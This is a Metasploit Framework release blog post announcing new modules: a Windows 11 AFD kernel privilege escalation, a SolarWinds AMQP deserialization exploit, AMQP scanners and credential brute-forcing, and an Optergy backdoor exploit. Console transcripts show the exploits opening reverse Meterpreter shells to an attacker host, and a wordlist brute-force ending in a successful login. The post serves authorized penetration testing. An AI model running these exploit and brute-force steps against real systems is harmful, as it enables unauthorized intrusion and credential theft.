Last updated at Thu, 18 Jan 2024 21:27:25 GMT

Windows 11 ADF WinSock Priv Esc

The new windows/local/cve_2023_21768_afd_lpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the new I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir research and provides a full read/write primitive on Windows 11. This exploit is a write-where bug that allows arbitrary write of one byte in kernel memory. This is enough to modify the I/O ring internal structures and get remote code execution as the NT AUTHORITY\SYSTEM user. The Metasploit module is based on the exploit PoC authored by chompie1337 and b33f .

Example running with Windows 11 Version 22H2 Build 22621.963 x64:

msf6 exploit(windows/local/cve_2023_21768_afd_lpe) > run verbose=true
[*] Started reverse TCP handler on 192.168.100.9:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Windows Build Number = 22621.963
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 3748 launched.
[*] Reflectively injecting the DLL into 3748...
[*] Sending stage (200774 bytes) to 192.168.100.9
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 11 opened (192.168.100.9:4444 -> 192.168.100.9:55346) at 2023-03-27 18:46:08 +0200
meterpreter >

SolarWinds RCE and AMQP Support

Metasploit 6.3.10 now has support for the Advanced Message Queuing Protocol (AMQP). This protocol is used in services such as RabbitMQ. Three new modules have been added that leverage this functionality thanks to the work of our very own Spencer McIntyre:

The exploits/windows/misc/solarwinds_amqp_deserialization module adds an exploit for CVE-2022-38108 which is an authenticated .NET deserialization vulnerability within the SolarWinds platform's SWIS (SolarWinds Information Service) component. To trigger the vulnerability, an attacker must authenticate to the RabbitMQ (message queue) server (via the AMQP protocol) and publish a specially crafted object. Once SWIS receives the message, it will deserialize it, allowing for OS command execution as NT AUTHORITY\SYSTEM. Example targeting SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64:

msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization 
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run
[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400
meterpreter >

The auxiliary/scanner/amqp/amqp_version module displays the version information about Advanced Message Queuing Protocol (AMQP) 0-9-1 servers:

msf6 > use auxiliary/scanner/amqp/amqp_version
msf6 auxiliary(scanner/amqp/amqp_version) > set RHOSTS 192.168.159.0/24
RHOSTS => 192.168.159.0/24
msf6 auxiliary(scanner/amqp/amqp_version) > run
[*] 192.168.159.17:5671 - AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PLAIN)
[*] 192.168.159.0/24:5671 - Scanned  51 of 256 hosts (19% complete)
[*] 192.168.159.0/24:5671 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.159.0/24:5671 - Scanned  98 of 256 hosts (38% complete)
[*] 192.168.159.128:5671 - AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
[*] 192.168.159.0/24:5671 - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.159.0/24:5671 - Scanned 150 of 256 hosts (58% complete)
[*] 192.168.159.0/24:5671 - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.159.0/24:5671 - Scanned 199 of 256 hosts (77% complete)
[*] 192.168.159.0/24:5671 - Scanned 216 of 256 hosts (84% complete)
[*] 192.168.159.0/24:5671 - Scanned 233 of 256 hosts (91% complete)
[*] 192.168.159.0/24:5671 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_version) > services 
Services
========
host             port  proto  name   state  info
----             ----  -----  ----   -----  ----
192.168.159.17   5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PL
                                            AIN)
192.168.159.128  5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
msf6 auxiliary(scanner/amqp/amqp_version) 

The new auxiliary/scanner/amqp/amqp_login module can be used to bruteforce service credentials:

msf6 > use auxiliary/scanner/amqp/amqp_login 
msf6 auxiliary(scanner/amqp/amqp_login) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/amqp/amqp_login) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(scanner/amqp/amqp_login) > set PASS_FILE data/wordlists/unix_passwords.txt
PASS_FILE => data/wordlists/unix_passwords.txt
msf6 auxiliary(scanner/amqp/amqp_login) > set RPORT 5672
RPORT => 5672
msf6 auxiliary(scanner/amqp/amqp_login) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 auxiliary(scanner/amqp/amqp_login) > run
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:Password1! (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:admin (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:12345 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456789 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[+] 192.168.159.128:5672 - Login Successful: admin:password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_login) > 

New module content (5)

AMQP 0-9-1 Login Check Scanner

Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17828 contributed by zeroSteiner

Description: This adds a login scanner module for AMQP services

AMQP 0-9-1 Version Scanner

Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17827 contributed by zeroSteiner

Description: This adds a scanner module that extracts version information from AMQP protocol servers.

Optergy Proton and Enterprise BMS Command Injection using a backdoor

Authors: Gjoko Krstic and h00die-gr3y
Type: Exploit
Pull request: #17806 contributed by h00die-gr3y
AttackerKB reference: CVE-2019-7276

Description: This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications.

Ancillary Function Driver (AFD) for WinSock Elevation of Privilege

Authors: Christophe De La Fuente, Yarden Shafir, b33f, and chompie
Type: Exploit
Pull request: #17826 contributed by cdelafuente-r7
AttackerKB reference: CVE-2023-21768

Description: This PR adds an exploit module for CVE-2023-21768 that achieves local privilege escalation on Windows 11 2H22.

SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE

Authors: Justin Hong, Lucas Miller, Piotr Bazydło, and Spencer McIntyre
Type: Exploit
Pull request: #17785 contributed by zeroSteiner
AttackerKB reference: CVE-2022-38108

Description: This adds an exploit for an authenticated .NET deserialization vulnerability that affects the SolarWinds Information Service (SWIS) component within SolarWinds. The SWIS component will deserialize messages received by the AMQP message queue, resulting in command execution as NT AUTHORITY\SYSTEM.

Enhancements and features (6)

  • #17724 from dwelch-r7 - Updates the modules/auxiliary/admin/kerberos/forge_ticket.rb module with a new IncludeTicketChecksum option. When set to true the forged PAC will include the PAC_TICKET_CHECKSUM required in newer Windows AD implementations
  • #17753 from adfoster-r7 - Updates the auxiliary/admin/kerberos/get_ticket module to support using forged golden tickets. Users can now provide the Krb5Ccname option to supply the Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked for a valid TGT as normal
  • #17789 from bcoles - This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
  • #17789 from bcoles - This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
  • #17813 from samueloph - This sets the CHECK_FALSE option to true by default so that the scanner will bail upon detecting false positive results.
  • #17833 from adfoster-r7 - Updates the Metasploit RPC module.info command response to include whether or not the module supports a check method

Bugs fixed (6)

  • #17704 from ide0x90 - Fixes a crash in multi/http/solr_velocity_rce that was discovered when targeting a machine running Apache Solr 8.3.0 on Linux that required authentication.
  • #17808 from adfoster-r7 - Updates multiple broken Secunia references in modules with equivalent links found within Wayback Machine - a digital archive of the world wide web founded by the Internet Archive.
  • #17818 from adfoster-r7 - This PR fixes a crash in the RPC job info command.
  • #17825 from dm-ct - Fixes broken documentation references in the exploits/linux/local/zimbra_slapper_priv_esc module
  • #17830 from bcoles - Fixes a crash when parsing dates in ./tools/modules/committer_count.rb
  • #17831 from dm-ct - Fixes broken documentation references in the exploits/aix/rpc_cmsd_opcode21.rb module

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).